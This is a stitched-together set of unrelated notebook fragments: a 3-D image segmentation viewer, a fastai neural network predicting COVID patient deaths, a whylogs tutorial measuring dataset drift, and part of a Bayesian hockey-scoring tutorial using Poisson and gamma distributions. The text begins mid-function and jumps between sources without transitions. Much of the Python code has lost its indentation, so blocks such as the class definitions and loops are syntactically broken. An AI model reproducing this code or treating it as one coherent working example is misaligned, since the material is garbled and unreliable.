zoom0 = 250
#Image is grayscale
    print('shape', np.array(raw[1,:,:]).shape)
im1 = ax1.imshow(raw[1,:,:],cmap=cm.Greys_r)
ax1.set_title('Raw Image')
im = np.zeros((im_size,im_size,3))
im[:,:,:]=label[1,:,:,:]
im2 = ax2.imshow(im)
ax2.set_title('Groundtruth')
im_ = np.zeros((im2_size,im2_size))
im_[:,:]=seg[1,:,:]
    print('shape', np.array(im_).shape)
im3 = ax3.imshow(im_,cmap=cmap)
ax3.set_title('Seg')
    axdepth = fig.add_axes([0.25, 0.3, 0.65, 0.03], facecolor='white')  # 'axisbg' was removed in newer matplotlib
#axzoom = fig.add_axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)
depth = Slider(axdepth, 'Min', 0, im_size, valinit=depth0,valfmt='%0.0f')
#zoom = Slider(axmax, 'Max', 0, 250, valinit=max0)
def update(val):
z = int(depth.val)
im1.set_data(raw[z,:,:])
im[:,:,:]=label[z,:,:,:]
im2.set_data(im)
im_[:,:]=seg[z,:,:]
im3.set_data(im_)
fig.canvas.draw()
depth.on_changed(update)
plt.show()
## Just to access the images...
data_folder = 'nobackup/turaga/data/fibsem_medulla_7col/tstvol-520-1-h5/'
os.chdir('/.')
#Open training data
f = h5py.File(data_folder + 'img_normalized.h5', 'r')
data_set = f['main'] #520,520,520, z,y,x
print(data_set.shape)
#Open training labels
g = h5py.File(data_folder + 'groundtruth_aff.h5', 'r')
label_set = np.asarray(g['main'],dtype='float32') #3,520,520,520 3,z,y,x
print(label_set.shape)
# transpose so they match image
label_set = np.transpose(label_set,(1,2,3,0)) # z,y,x,3
hdf5_seg_file = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
hdf5_seg = h5py.File(hdf5_seg_file, 'r')
seg = np.asarray(hdf5_seg['main'],dtype='uint32')
print('seg:', seg.shape, np.max(seg), np.min(seg))
# reshape labels, image
gt_data_dimension = label_set.shape[0]
data_dimension = seg.shape[1]
if gt_data_dimension != data_dimension:
    padding = (gt_data_dimension - data_dimension) // 2  # integer division so the slice indices are ints
print(data_set.shape,padding)
data_set = data_set[padding:(-1*padding),padding:(-1*padding),padding:(-1*padding)]
print("label_set before",label_set.shape)
label_set = label_set[padding:(-1*padding),padding:(-1*padding),padding:(-1*padding),:]
print("label_set",label_set.shape)
display(data_set, label_set, seg, im_size=520, im2_size=520)
hdf5_seg_file = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
hdf5_seg = h5py.File(hdf5_seg_file, 'r')
seg = np.asarray(hdf5_seg['main'],dtype='uint32')
#print(seg[0:30])
print('seg:', seg.shape, np.max(seg), np.min(seg))
```
# Read Libraries
```
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import KFold
from sklearn.preprocessing import OneHotEncoder
from sklearn import metrics
# fastai tabular learner (deep learning on tabular data)
from fastai.tabular import *
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
PATH = '/media/maria/2TB Monster driv/PrecisionFDA/'
PATH_COVID = '/media/maria/2TB Monster driv/PrecisionFDA/LightGBM/COVID/'
from fastai.callbacks import *
```
# Read Data
```
train = pd.read_csv(PATH + 'Descriptive/train.csv')
test = pd.read_csv(PATH + 'Descriptive/test.csv')
nocovid = pd.read_csv(PATH_COVID + 'no_covid_predicted.csv')
#Remove no covid
train = train.loc[train.COVID_Status == 1]
train.shape
oof_df = train[["Id", "Death"]]
train.drop(columns=['COVID_Status', 'Hospitalized', 'Ventilator', 'ICU', 'Id',
'Days_hospitalized', 'Days_ICU', 'Death Certification'], inplace=True)
#Display all database
def display_all(df):
with pd.option_context("display.max_rows", 1000, "display.max_columns", 1000):
display(df)
display_all(train.describe())
```
# Training Neural Network
```
procs = [FillMissing, Categorify, Normalize]
dep_var = 'Death'
cat_names = ['DRIVERS' , 'PASSPORT', 'MARITAL', 'RACE', 'ETHNICITY',
'GENDER', 'COUNTY', 'PLACE_BIRTH']
PATH_data = PATH + 'Descriptive/'
#https://www.kaggle.com/dromosys/fast-ai-v1-focal-loss
from torch import nn
import torch.nn.functional as F
#Parameters of focal loss
class FocalLoss(nn.Module):
def __init__(self, alpha=1, gamma=5, logits=False, reduction='elementwise_mean'):
super(FocalLoss, self).__init__()
self.alpha = alpha
self.gamma = gamma
self.logits = logits
self.reduction = reduction
def forward(self, inputs, targets):
if self.logits:
BCE_loss = F.binary_cross_entropy_with_logits(inputs, targets, reduction='none')
else:
BCE_loss = F.binary_cross_entropy(inputs, targets, reduction='none')
pt = torch.exp(-BCE_loss)
F_loss = self.alpha * (1-pt)**self.gamma * BCE_loss
if self.reduction is None:
return F_loss
else:
return torch.mean(F_loss)
# Setting random seed
SEED = 2019
def seed_everything(seed):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
#tf.set_random_seed(seed)
seed_everything(SEED)
def auroc_score(input, target):
input, target = input.cpu().numpy()[:,1], target.cpu().numpy()
return roc_auc_score(target, input)
class AUROC(Callback):
_order = -20 #Needs to run before the recorder
def __init__(self, learn, **kwargs): self.learn = learn
def on_train_begin(self, **kwargs): self.learn.recorder.add_metric_names(['AUROC'])
def on_epoch_begin(self, **kwargs): self.output, self.target = [], []
def on_batch_end(self, last_target, last_output, train, **kwargs):
if not train:
self.output.append(last_output)
self.target.append(last_target)
def on_epoch_end(self, last_metrics, **kwargs):
if len(self.output) > 0:
output = torch.cat(self.output)
target = torch.cat(self.target)
preds = F.softmax(output, dim=1)
metric = auroc_score(preds, target)
return add_metrics(last_metrics,[metric])
len(test)
#5 Fold cross-validation
nfold = 5
target = 'Death'
skf = KFold(n_splits=nfold, shuffle=True, random_state=2019)
oof = np.zeros(len(train))
predictions = np.zeros(len(test))
train['Death'].describe()
test.shape
dep_var
#Find Learning Rate
i = 1
cont_names = set(train) - set(cat_names) - {dep_var}
for train_index, valid_idx in skf.split(train, train.Death.values):
if i>1:
break
print("\nfold {}".format(i))
data= (TabularList.from_df(train, path=PATH_data, cat_names=cat_names, cont_names= cont_names, procs=procs)
.split_by_idx(valid_idx)
.label_from_df(cols=dep_var, label_cls=CategoryList)
.databunch(bs=4096))
learn = tabular_learner(data, layers=[3600, 1800], emb_drop=0.05, metrics=accuracy) #like rossmann
#learn.loss_fn = FocalLoss()
learn.lr_find()
learn.recorder.plot()
i=i+1
i = 1
lr = 1e-2
for train_index, valid_idx in skf.split(train, train.Death.values):
print("\nfold {}".format(i))
data = (TabularList.from_df(train, path=PATH_data, cat_names=cat_names, cont_names= cont_names, procs=procs)
.split_by_idx(valid_idx)
.label_from_df(cols=dep_var, label_cls=CategoryList)
.add_test(TabularList.from_df(test, path=PATH_data, cat_names=cat_names, cont_names= cont_names))
.databunch(bs=4096))
learn = tabular_learner(data, layers=[3600, 1800], emb_drop=0.05, metrics=accuracy) #like rossmann
#learn.loss_fn = FocalLoss()
learn.fit_one_cycle(15, slice(lr), callbacks=[AUROC(learn),SaveModelCallback(learn, every='improvement',
monitor='valid_loss', name='bestmodel_death_fold{}'.format(i))],
wd=0.1)
learn.load('bestmodel_death_fold{}'.format(i))
interp = ClassificationInterpretation.from_learner(learn)
from sklearn import metrics
print(metrics.classification_report(interp.y_true.numpy(), interp.pred_class.numpy()))
preds_valid = learn.get_preds(ds_type=DatasetType.Valid)
predictions_v = []
for j in range(len(valid_idx)):
predictions_v.append(float(preds_valid[0][j][1].cpu().numpy()))
oof[valid_idx] = predictions_v
preds = learn.get_preds(ds_type=DatasetType.Test)
predictions_t = []
for j in range(test.shape[0]):
predictions_t.append(float(preds[0][j][1].cpu().numpy()))
predictions += predictions_t
i = i + 1
print("\n\nCV AUC: {:<0.5f}".format(metrics.roc_auc_score(train.Death.values.astype(bool), oof)))
print("\n\nCV log loss: {:<0.5f}".format(metrics.log_loss(train.Death.values.astype(bool), oof)))
print("\n\nCV Gini: {:<0.5f}".format(2 * metrics.roc_auc_score(train.Death.values.astype(bool), oof) -1))
#threshold optimization
maximum = 0
for i in range(1000):
f1 = metrics.f1_score(train.Death.values.astype(bool), oof >i*.001)
if f1 > maximum:
maximum=f1
threshold = i*0.001
print(f'Maximum f1 value: {maximum}' , f'Probability cutoff: {threshold}' )
print(metrics.classification_report(train.Death.values.astype(bool), oof >threshold))
```
# Explanations
```
pred = oof
#code from https://forums.fast.ai/t/feature-importance-in-deep-learning/42026/6
def feature_importance(learner, cat_names, cont_names):
# based on: https://medium.com/@mp.music93/neural-networks-feature-importance-with-fastai-5c393cf65815
loss0 = np.array([learner.loss_func(learner.pred_batch(batch=(x,y.to("cpu"))), y.to("cpu")) for x,y in iter(learner.data.valid_dl)]).mean()
fi = dict()
types = [cat_names, cont_names]
for j, t in enumerate(types):
for i, c in enumerate(t):
loss = []
for x,y in iter(learner.data.valid_dl):
col = x[j][:,i] #x[0] da hier cat-vars
idx = torch.randperm(col.nelement())
x[j][:,i] = col.view(-1)[idx].view(col.size())
y = y.to('cpu')
loss.append(learner.loss_func(learner.pred_batch(batch=(x,y)), y))
fi[c] = np.array(loss).mean()-loss0
d = sorted(fi.items(), key = lambda kv: kv[1], reverse = True)
return pd.DataFrame({'cols': [l for l, v in d], 'imp': np.log1p([v for l, v in d])})
imp = feature_importance(learn, cat_names, cont_names)
imp[:20].plot.barh(x="cols", y="imp", figsize=(10, 10))
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
fpr_rf, tpr_rf, _ = roc_curve(train.Death.values.astype(bool), oof)
plt.figure(1)
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_rf, tpr_rf, label='RF')
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve')
plt.legend(loc='best')
plt.show()
sub_df = pd.read_csv(PATH + 'Descriptive/test.csv')
sub_df["Death"] = predictions/nfold
nocovid["COVID_flag"] = 0
sub_df = sub_df.merge(nocovid, how='left', left_on ='Id', right_on ='Id')
sub_df['COVID_flag'] = sub_df['COVID_flag'].fillna(1)
#If no covid all probabilities 0
sub_df["Death"] = sub_df["Death"] * sub_df['COVID_flag']
sub_df[['Id', 'Death']].to_csv("NN_Death_status.csv", index=False, line_terminator='\n', header=False)
np.mean(sub_df["Death"])  # mean predicted death probability (predictions were already averaged over the folds above)
```
# Detecting Dataset Drift with whylogs
We will be using data from Kaggle (https://www.kaggle.com/yugagrawal95/sample-media-spends-data) that is packaged with this notebook.
```
%matplotlib inline
import datetime
import math
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from whylogs import get_or_create_session
# Read our Media Spend dataset as Pandas dataframe
data = pd.read_csv("MediaSpendDataset.csv",
parse_dates=["Calendar_Week"], infer_datetime_format=True)
data
```
As we can see, we have advertising and media impressions and views per week for a number of marketing campaigns run by an unnamed company, along with the sales achieved against those spends.
## Exploratory Data Analysis
Let's now explore the dataset; we have very little metadata or context.
```
data.groupby("Calendar_Week").count().T
data.groupby("Division").count().T
```
We see that the *Z* division has twice as many entries as the other divisions.
```
fig, ax = plt.subplots(figsize=(10, 3))
sns.lineplot(x="Calendar_Week", y="Sales", data=data, ax=ax)
fig, ax = plt.subplots(figsize=(10, 3))
sns.scatterplot(x="Google_Impressions", y="Sales", data=data, ax=ax)
```
Let's compare the earlier portion of the data with the most recent portion, which happens to capture differences in spending prior to and during the COVID-19 global pandemic.
## Profiling with whylogs
```
model_date = datetime.datetime(2020, 1, 1)
training_data = data[data["Calendar_Week"] < model_date]
test_data = data[data["Calendar_Week"] >= model_date]
session = get_or_create_session()
profiles = []
profiles.append(session.log_dataframe(training_data, dataset_timestamp=model_date))
profiles.append(session.log_dataframe(test_data, dataset_timestamp=datetime.datetime.now()))
profiles
```
We can compare the data we'll use for training with that in early 2020.
```
# Training data profile summary
training_summary = profiles[0].flat_summary()["summary"]
training_summary
# Test data profile summary
test_summary = profiles[1].flat_summary()["summary"]
test_summary
```
## Dataset Drift in whylogs Data
We need to understand how the data changes between the training and test datasets. To do so, let's first view one of the many objects in the dataset profile provided by whylogs: a histogram for each tracked feature. We can then inspect the **Overall_Views** feature.
```
training_histograms = profiles[0].flat_summary()["hist"]
test_histograms = profiles[1].flat_summary()["hist"]
test_histograms["Overall_Views"]
```
While we plan to integrate a convenient dataset shift visualization and analysis API soon, you can always access the attributes you need directly.
We will first define a custom range and bins, then utilize our access to the data sketches' probability mass function. We then visualize these values using Seaborn.
```
def get_custom_histogram_info(variable, n_bins):
min_range = min(training_summary[training_summary["column"]==variable]["min"].values[0],
test_summary[test_summary["column"]==variable]["min"].values[0])
max_range = max(training_summary[training_summary["column"]==variable]["max"].values[0],
test_summary[test_summary["column"]==variable]["max"].values[0])
bins = range(int(min_range), int(max_range), int((max_range-min_range)/n_bins))
training_counts = np.array(
profiles[0].columns[variable].number_tracker.histogram.get_pmf(bins[:-1]))
test_counts = np.array(
profiles[1].columns[variable].number_tracker.histogram.get_pmf(bins[:-1]))
return bins, training_counts, test_counts
def plot_distribution_shift(variable, n_bins):
"""Visualization for distribution shift"""
bins, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
fig, ax = plt.subplots(figsize=(10, 3))
sns.histplot(x=bins, weights=training_counts, bins=n_bins,
label="Training data", color="teal", alpha=0.7, ax=ax)
sns.histplot(x=bins, weights=test_counts, bins=n_bins,
label="Test data", color="gold", alpha=0.7, ax=ax)
ax.legend()
plt.show()
plot_distribution_shift("Overall_Views", n_bins=60)
```
While it is quite clear that the distribution in this case differs between the training and test datasets, we will likely need a quantitative measure. whylogs histogram metrics can be used to calculate dataset shift with a number of metrics: the Population Stability Index (PSI), the Kolmogorov-Smirnov statistic, the Kullback-Leibler divergence (or other f-divergences), and histogram intersection.
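For example, the Population Stability Index can be computed directly from the binned probability masses returned by the helper above. The following is a minimal sketch rather than a whylogs API; the smoothing constant `eps` is an assumption added to avoid taking the log of zero.
```
def calculate_psi(variable, n_bins, eps=1e-4):
    # PSI = sum over bins of (p - q) * ln(p / q), where p and q are the binned
    # probability masses of the training and test data respectively.
    _, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
    p = np.clip(training_counts, eps, None)
    q = np.clip(test_counts, eps, None)
    return np.sum((p - q) * np.log(p / q))

calculate_psi("Overall_Views", n_bins=60)
```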
## Kullback-Leibler divergence
This score, often shortened to K-L divergence, is a measure of how one probability distribution differs from a second, reference probability distribution. The K-L divergence can be interpreted as the average difference in the number of bits required to encode samples of one distribution (*P*) using a code optimized for another (*Q*) rather than one optimized for *P*. K-L divergence is not a true distance metric, as it is not symmetric and does not satisfy the triangle inequality.
However, this value has become quite popular and is easy to calculate in Python. We'll use scikit-learn's `mutual_info_score` here.
```
from sklearn.metrics import mutual_info_score
def calculate_kl_divergence(variable, n_bins):
_, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
return mutual_info_score(training_counts, test_counts)
calculate_kl_divergence("Overall_Views", n_bins=60)
```
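Note that `mutual_info_score` treats the two count vectors as label assignments rather than as the two distributions themselves. If a direct K-L divergence between the binned training and test distributions is preferred, a minimal sketch using `scipy.stats.entropy` could look like the following; the smoothing constant is an assumption added to keep the ratio finite.
```
from scipy.stats import entropy

def calculate_kl_divergence_direct(variable, n_bins, eps=1e-9):
    # entropy(p, q) returns sum(p * log(p / q)) after normalizing p and q,
    # i.e. the K-L divergence D(P_train || Q_test) over the shared bins.
    _, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
    return entropy(training_counts + eps, test_counts + eps)

calculate_kl_divergence_direct("Overall_Views", n_bins=60)
```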
## Histogram intersection metric
Our second metric is the histogram intersection score, which is an intuitive metric that measures the area of overlap between the two probability distributions. A histogram intersection score of 0.0 represents no overlap while a score of 1.0 represents identical distributions. This score requires discretized probability distributions and depends heavily on the choice of bin size and scale used.
```
def calculate_histogram_intersection(variable, n_bins):
_, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
result = 0
for i in range(n_bins):
result += min(training_counts[i], test_counts[i])
return result
calculate_histogram_intersection("Overall_Views", n_bins=60)
calculate_histogram_intersection("Sales", n_bins=60)
```
Bayesian Zig Zag
===
Developing probabilistic models using grid methods and MCMC.
Thanks to Chris Fonnesbeck for his help with this notebook, and to Colin Carroll, who added features to pymc3 to support some of these examples.
To install the most current version of pymc3 from source, run
```
pip3 install -U git+https://github.com/pymc-devs/pymc3.git
```
Copyright 2018 Allen Downey
MIT License: https://opensource.org/licenses/MIT
```
from __future__ import print_function, division
%matplotlib inline
%config InteractiveShell.ast_node_interactivity='last_expr_or_assign'
import numpy as np
import pymc3 as pm
import matplotlib.pyplot as plt
```
## Simulating hockey
I'll model hockey as a Poisson process, where each team has some long-term average scoring rate, `lambda`, in goals per game.
For the first example, we'll assume that `lambda` is known (somehow) to be 2.7. Since regulation play (as opposed to overtime) is 60 minutes, we can compute the goal scoring rate per minute.
```
lam_per_game = 2.7
min_per_game = 60
lam_per_min = lam_per_game / min_per_game
lam_per_min, lam_per_min**2
```
If we assume that a goal is equally likely during any minute of the game, and we ignore the possibility of scoring more than one goal in the same minute, we can simulate a game by generating one random value each minute.
```
np.random.random(min_per_game)
```
If the random value is less than `lam_per_min`, that means we score a goal during that minute.
```
np.random.random(min_per_game) < lam_per_min
```
So we can get the number of goals scored by one team like this:
```
np.sum(np.random.random(min_per_game) < lam_per_min)
```
I'll wrap that in a function.
```
def half_game(lam_per_min, min_per_game=60):
return np.sum(np.random.random(min_per_game) < lam_per_min)
```
And simulate 10 games.
```
size = 10
sample = [half_game(lam_per_min) for i in range(size)]
```
If we simulate 1000 games, we can see what the distribution looks like. The average of this sample should be close to `lam_per_game`.
```
size = 1000
sample_sim = [half_game(lam_per_min) for i in range(size)]
np.mean(sample_sim), lam_per_game
```
## PMFs
To visualize distributions, I'll start with a probability mass function (PMF), which I'll implement using a `Counter`.
```
from collections import Counter
class Pmf(Counter):
def normalize(self):
"""Normalizes the PMF so the probabilities add to 1."""
total = sum(self.values())
for key in self:
self[key] /= total
def sorted_items(self):
"""Returns the outcomes and their probabilities."""
return zip(*sorted(self.items()))
```
Here are some functions for plotting PMFs.
```
plot_options = dict(linewidth=3, alpha=0.6)
def underride(options):
"""Add key-value pairs to d only if key is not in d.
options: dictionary
"""
for key, val in plot_options.items():
options.setdefault(key, val)
return options
def plot(xs, ys, **options):
"""Line plot with plot_options."""
plt.plot(xs, ys, **underride(options))
def bar(xs, ys, **options):
"""Bar plot with plot_options."""
plt.bar(xs, ys, **underride(options))
def plot_pmf(sample, **options):
"""Compute and plot a PMF."""
pmf = Pmf(sample)
pmf.normalize()
xs, ps = pmf.sorted_items()
bar(xs, ps, **options)
def pmf_goals():
"""Decorate the axes."""
plt.xlabel('Number of goals')
plt.ylabel('PMF')
plt.title('Distribution of goals scored')
legend()
def legend(**options):
"""Draw a legend only if there are labeled items.
"""
ax = plt.gca()
handles, labels = ax.get_legend_handles_labels()
if len(labels):
plt.legend(**options)
```
Here's what the results from the simulation look like.
```
plot_pmf(sample_sim, label='simulation')
pmf_goals()
```
## Analytic distributions
For the simulation we just did, we can figure out the distribution analytically: it's a binomial distribution with parameters `n` and `p`, where `n` is the number of minutes and `p` is the probability of scoring a goal during any minute.
We can use NumPy to generate a sample from a binomial distribution.
```
n = min_per_game
p = lam_per_min
sample_bin = np.random.binomial(n, p, size)
np.mean(sample_bin)
```
And confirm that the results are similar to what we got from the model.
```
plot_pmf(sample_sim, label='simulation')
plot_pmf(sample_bin, label='binomial')
pmf_goals()
```
But plotting PMFs is a bad way to compare distributions. It's better to use the cumulative distribution function (CDF).
```
def plot_cdf(sample, **options):
"""Compute and plot the CDF of a sample."""
pmf = Pmf(sample)
xs, freqs = pmf.sorted_items()
    ps = np.cumsum(freqs, dtype=float)
ps /= ps[-1]
plot(xs, ps, **options)
def cdf_rates():
"""Decorate the axes."""
plt.xlabel('Goal scoring rate (mu)')
plt.ylabel('CDF')
plt.title('Distribution of goal scoring rate')
legend()
def cdf_goals():
"""Decorate the axes."""
plt.xlabel('Number of goals')
plt.ylabel('CDF')
plt.title('Distribution of goals scored')
legend()
def plot_cdfs(*sample_seq, **options):
"""Plot multiple CDFs."""
for sample in sample_seq:
plot_cdf(sample, **options)
cdf_goals()
```
Now we can compare the results from the simulation and the sample from the binomial distribution.
```
plot_cdf(sample_sim, label='simulation')
plot_cdf(sample_bin, label='binomial')
cdf_goals()
```
## Poisson process
For large values of `n`, the binomial distribution converges to the Poisson distribution with parameter `mu = n * p`, which is also `mu = lam_per_game`.
```
mu = lam_per_game
sample_poisson = np.random.poisson(mu, size)
np.mean(sample_poisson)
```
And we can confirm that the results are consistent with the simulation and the binomial distribution.
```
plot_cdfs(sample_sim, sample_bin)
plot_cdf(sample_poisson, label='poisson', linestyle='dashed')
legend()
```
## Warming up PyMC
Soon we will want to use `pymc3` to do inference, which is really what it's for. But just to get warmed up, I will use it to generate a sample from a Poisson distribution.
```
model = pm.Model()
with model:
goals = pm.Poisson('goals', mu)
trace = pm.sample_prior_predictive(1000)
len(trace['goals'])
sample_pm = trace['goals']
np.mean(sample_pm)
```
This example is like using a cannon to kill a fly. But it helps us learn to use the cannon.
```
plot_cdfs(sample_sim, sample_bin, sample_poisson)
plot_cdf(sample_pm, label='poisson pymc', linestyle='dashed')
legend()
```
## Evaluating the Poisson distribution
One of the nice things about the Poisson distribution is that we can compute its CDF and PMF analytically. We can use the CDF to check, one more time, the previous results.
```
import scipy.stats as st
xs = np.arange(11)
ps = st.poisson.cdf(xs, mu)
plot_cdfs(sample_sim, sample_bin, sample_poisson, sample_pm)
plt.plot(xs, ps, label='analytic', linestyle='dashed')
legend()
```
And we can use the PMF to compute the probability of any given outcome. Here's what the analytic PMF looks like:
```
xs = np.arange(11)
ps = st.poisson.pmf(xs, mu)
bar(xs, ps, label='analytic PMF')
pmf_goals()
```
And here's a function that computes the probability of scoring a given number of goals in a game, for a known value of `mu`.
```
def poisson_likelihood(goals, mu):
"""Probability of goals given scoring rate.
goals: observed number of goals (scalar or sequence)
mu: hypothetical goals per game
returns: probability
"""
return np.prod(st.poisson.pmf(goals, mu))
```
Here's the probability of scoring 6 goals in a game if the long-term rate is 2.7 goals per game.
```
poisson_likelihood(goals=6, mu=2.7)
```
Here's the probability of scoring 3 goals.
```
poisson_likelihood(goals=3, mu=2.7)
```
This function also works with a sequence of goals, so we can compute the probability of scoring 6 goals in the first game and 2 in the second.
```
poisson_likelihood(goals=[6, 2], mu=2.7)
```
## Bayesian inference with grid approximation
Ok, it's finally time to do some inference! The function we just wrote computes the likelihood of the data, given a hypothetical value of `mu`:
$\mathrm{Prob}~(x ~|~ \mu)$
But what we really want is the distribution of `mu`, given the data:
$\mathrm{Prob}~(\mu ~|~ x)$
If only there were some theorem that relates these probabilities!
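That theorem is Bayes's theorem, which in this notation says

$\mathrm{Prob}~(\mu ~|~ x) = \mathrm{Prob}~(\mu) ~ \mathrm{Prob}~(x ~|~ \mu) ~/~ \mathrm{Prob}~(x)$

Since the denominator does not depend on $\mu$, we can update each hypothesis by multiplying its prior probability by the likelihood of the data and then renormalizing.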
The following class implements Bayes's theorem.
```
class Suite(Pmf):
"""Represents a set of hypotheses and their probabilities."""
def bayes_update(self, data, like_func):
"""Perform a Bayesian update.
data: some representation of observed data
like_func: likelihood function that takes (data, hypo), where
hypo is the hypothetical value of some parameter,
and returns P(data | hypo)
"""
for hypo in self:
self[hypo] *= like_func(data, hypo)
self.normalize()
def plot(self, **options):
"""Plot the hypotheses and their probabilities."""
xs, ps = self.sorted_items()
plot(xs, ps, **options)
def pdf_rate():
"""Decorate the axes."""
plt.xlabel('Goals per game (mu)')
plt.ylabel('PDF')
plt.title('Distribution of goal scoring rate')
legend()
```
I'll start with a uniform prior just to keep things simple. We'll choose a better prior later.
```
hypo_mu = np.linspace(0, 20, num=51)
hypo_mu
```
Initially `suite` represents the prior distribution of `mu`.
```
suite = Suite(hypo_mu)
suite.normalize()
suite.plot(label='prior')
pdf_rate()
```
Now we can update it with the data and plot the posterior.
```
suite.bayes_update(data=6, like_func=poisson_likelihood)
suite.plot(label='posterior')
pdf_rate()
```
With a uniform prior, the posterior is the likelihood function, and the MAP is the value of `mu` that maximizes likelihood, which is the observed number of goals, 6.
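(Why 6? For a single Poisson observation $x$, the log-likelihood is $x \log \mu - \mu + \text{const}$, whose derivative $x/\mu - 1$ is zero at $\mu = x$, so the likelihood peaks at the observed count.)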
This result is probably not reasonable, because the prior was not reasonable.
## A better prior
To construct a better prior, I'll use scores from previous Stanley Cup finals to estimate the parameters of a gamma distribution.
Why gamma? You'll see.
Here are (total goals)/(number of games) for both teams from 2013 to 2017, not including games that went into overtime.
```
xs = [13/6, 19/6, 8/4, 4/4, 10/6, 13/6, 2/2, 4/2, 5/3, 6/3]
```
If those values were sampled from a gamma distribution, we can estimate its parameters, `k` and `theta`.
```
def estimate_gamma_params(xs):
"""Estimate the parameters of a gamma distribution.
See https://en.wikipedia.org/wiki/Gamma_distribution#Parameter_estimation
"""
s = np.log(np.mean(xs)) - np.mean(np.log(xs))
k = (3 - s + np.sqrt((s-3)**2 + 24*s)) / 12 / s
theta = np.mean(xs) / k
alpha = k
beta = 1 / theta
return alpha, beta
```
Here are the estimates.
```
alpha, beta = estimate_gamma_params(xs)
print(alpha, beta)
```
The following function takes `alpha` and `beta` and returns a "frozen" distribution from SciPy's stats module:
```
def make_gamma_dist(alpha, beta):
"""Returns a frozen distribution with given parameters.
"""
return st.gamma(a=alpha, scale=1/beta)
```
The frozen distribution knows how to compute its mean and standard deviation:
```
dist = make_gamma_dist(alpha, beta)
print(dist.mean(), dist.std())
```
And it can compute its PDF.
```
hypo_mu = np.linspace(0, 10, num=101)
ps = dist.pdf(hypo_mu)
plot(hypo_mu, ps, label='gamma(9.6, 5.1)')
pdf_rate()
```
We can use `make_gamma_dist` to construct a prior suite with the given parameters.
```
def make_gamma_suite(xs, alpha, beta):
"""Makes a suite based on a gamma distribution.
xs: places to evaluate the PDF
alpha, beta: parameters of the distribution
returns: Suite
"""
dist = make_gamma_dist(alpha, beta)
ps = dist.pdf(xs)
prior = Suite(dict(zip(xs, ps)))
prior.normalize()
return prior
```
Here's what it looks like.
```
prior = make_gamma_suite(hypo_mu, alpha, beta)
prior.plot(label='gamma prior')
pdf_rate()
```
And we can update this prior using the observed data.
```
posterior = prior.copy()
posterior.bayes_update(data=6, like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
pdf_rate()
```
The results are substantially different from what we got with the uniform prior.
```
suite.plot(label='posterior with uniform prior', color='gray')
posterior.plot(label='posterior with gamma prior', color='C1')
pdf_rate()
```
Suppose the same team plays again and scores 2 goals in the second game. We can perform a second update using the posterior from the first update as the prior for the second.
```
posterior2 = posterior.copy()
posterior2.bayes_update(data=2, like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
posterior2.plot(label='posterior2')
pdf_rate()
```
Or, starting with the original prior, we can update with both pieces of data at the same time.
```
posterior3 = prior.copy()
posterior3.bayes_update(data=[6, 2], like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
posterior2.plot(label='posterior2')
posterior3.plot(label='posterior3', linestyle='dashed')
pdf_rate()
```
## Update using conjugate priors
I'm using a gamma distribution as a prior in part because it has a shape that seems credible based on what I know about hockey.
But it is also useful because it happens to be the conjugate prior of the Poisson distribution, which means that if the prior is gamma and we update with a Poisson likelihood function, the posterior is also gamma.
See https://en.wikipedia.org/wiki/Conjugate_prior#Discrete_distributions
And often we can compute the parameters of the posterior with very little computation. If we observe `x` goals in `1` game, the new parameters are `alpha+x` and `beta+1`.
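To see why, note that the gamma prior density is proportional to $\mu^{\alpha-1} e^{-\beta \mu}$ and the Poisson likelihood of observing $x$ goals is proportional to $\mu^{x} e^{-\mu}$, so their product is proportional to $\mu^{\alpha+x-1} e^{-(\beta+1)\mu}$, which is a gamma density with parameters $\alpha+x$ and $\beta+1$. More generally, after $n$ games with a total of $\sum_i x_i$ goals, the parameters become $\alpha + \sum_i x_i$ and $\beta + n$.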
```
class GammaSuite:
"""Represents a gamma conjugate prior/posterior."""
def __init__(self, alpha, beta):
"""Initialize.
alpha, beta: parameters
dist: frozen distribution from scipy.stats
"""
self.alpha = alpha
self.beta = beta
self.dist = make_gamma_dist(alpha, beta)
def plot(self, xs, **options):
"""Plot the suite.
xs: locations where we should evaluate the PDF.
"""
ps = self.dist.pdf(xs)
ps /= np.sum(ps)
plot(xs, ps, **options)
def bayes_update(self, data):
return GammaSuite(self.alpha+data, self.beta+1)
```
Here's what the prior looks like using a `GammaSuite`:
```
gamma_prior = GammaSuite(alpha, beta)
gamma_prior.plot(hypo_mu, label='prior')
pdf_rate()
gamma_prior.dist.mean()
```
And here's the posterior after one update.
```
gamma_posterior = gamma_prior.bayes_update(6)
gamma_prior.plot(hypo_mu, label='prior')
gamma_posterior.plot(hypo_mu, label='posterior')
pdf_rate()
gamma_posterior.dist.mean()
```
And we can confirm that the posterior we get using the conjugate prior is the same as the one we got using a grid approximation.
```
gamma_prior.plot(hypo_mu, label='prior')
gamma_posterior.plot(hypo_mu, label='posterior conjugate')
posterior.plot(label='posterior grid', linestyle='dashed')
pdf_rate()
```
## Posterior predictive distribution
Ok, let's get to what is usually the point of this whole exercise, making predictions.
The posterior represents what we believe about the distribution of `mu` based on the data (and our prior beliefs).
